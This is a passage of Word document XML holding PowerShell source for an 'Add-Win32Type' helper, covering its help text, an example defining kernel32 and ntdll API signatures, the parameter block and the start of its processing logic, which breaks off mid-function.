    <w:p w14:paraId="0A9E7896" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Win32 unmanaged) functions in PowerShell. After providing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C84D699" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Add-Win32Type with a function signature, a .NET type is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F29B00F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        using reflection (i.e. csc.exe is never called like with Add-Type).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53E852" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27046676" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The 'func' helper function can be used to reduce typing when defining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB7A15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        multiple function definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E760D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B7A7FC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .PARAMETER DllName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5583E7C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="405EAC75" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The name of the DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0ADA13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A5CCF03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FunctionName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157E8434" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="31A277C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The name of the target function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D94882" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6ABF86CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ReturnType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A37609" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29F41202" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The return type of the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1363AF4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72489E8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ParameterTypes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F73394" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3482A2FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The function parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B37ECF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B1475D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER NativeCallingConvention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF953C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A0FEC9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Specifies the native calling convention of the function. Defaults to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF4E50E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        stdcall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41040F65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53CF7034" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Charset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581064EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="07FC3FAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        If you need to explicitly call an 'A' or 'W' Win32 function, you can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73237B14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        specify the character set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3335A70D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C567012" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SetLastError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B162DEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6CEC5FDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Indicates whether the callee calls the SetLastError Win32 API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4326BD23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        function before returning from the attributed method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4032BA5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="752442AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1EA5DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="31CDDFFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The in-memory module that will host the functions. Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42169213" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        New-InMemoryModule to define an in-memory module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EEC056" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4055907D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Namespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D94DEF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="433A24C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        An optional namespace to prepend to the type. Add-Win32Type defaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A20D4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        to a namespace consisting only of the name of the DLL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE564D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A598CF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38813D30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="51153E64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Mod = New-InMemoryModule -ModuleName Win32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37076802" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="322DDADC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FunctionDefinitions = @(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2432045D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">          (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE207A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">          (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90C71B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">          (func ntdll RtlGetCurrentPeb ([IntPtr]) @())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76332807" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239390DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F28BBDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BBB766" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Kernel32 = $Types['kernel32']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24777AD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Ntdll = $Types['ntdll']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AFE864" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Ntdll::RtlGetCurrentPeb()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757301D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ntdllbase = $Kernel32::GetModuleHandle('ntdll')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581A9A2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99A0F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13C0FDCC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .NOTES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD53B52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2851AC2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6047300F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="260B9701" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        When defining multiple function prototypes, it is ideal to provide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ACB5E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Add-Win32Type with an array of function signatures. That way, they</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCAABF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        are all incorporated into the same in-memory module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13340F28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F361EB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A451A42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [OutputType([Hashtable])]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780D56A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1339C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5A856" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77BBB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DllName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55693877" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="40A81708" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8853AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE7EB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FunctionName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49502A24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="236D83FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D63BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Type]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9839E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ReturnType,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F23080" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="463B99C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77867998" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Type[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3BF6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ParameterTypes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0347CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4EE6A53E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015E1B96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Runtime.InteropServices.CallingConvention]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254F7BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B050D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67195ABF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB3A6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Runtime.InteropServices.CharSet]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BDA77C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Charset = [Runtime.InteropServices.CharSet]::Auto,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCF4738" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23EBFCE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipelineByPropertyName = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F51B6F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE49FB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SetLastError,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFC044" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="520FBE8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory = $True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410E1CDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55760481" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Module,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B97A7E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="740FFC23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNull()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2448BAA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152DA742" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Namespace = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13765BDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAEA1F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C8896E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F115C9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A6D7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TypeHash = @{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E743AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1C39F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24E769DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    PROCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD4BCD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D6C7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Module -is [Reflection.Assembly])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6317857F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186938AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($Namespace)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AFE8AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D94DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TypeHash[$DllName] = $Module.GetType("$Namespace.$DllName")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C459E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B972D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56779B57" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F2E66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TypeHash[$DllName] = $Module.GetType($DllName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F3D812" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B4FC49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3F5CE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DAEDD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E34398" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # Define one type for each DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A50D09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if (!$TypeHash.ContainsKey($DllName))</w:t>
      </w:r>
    </w:p>
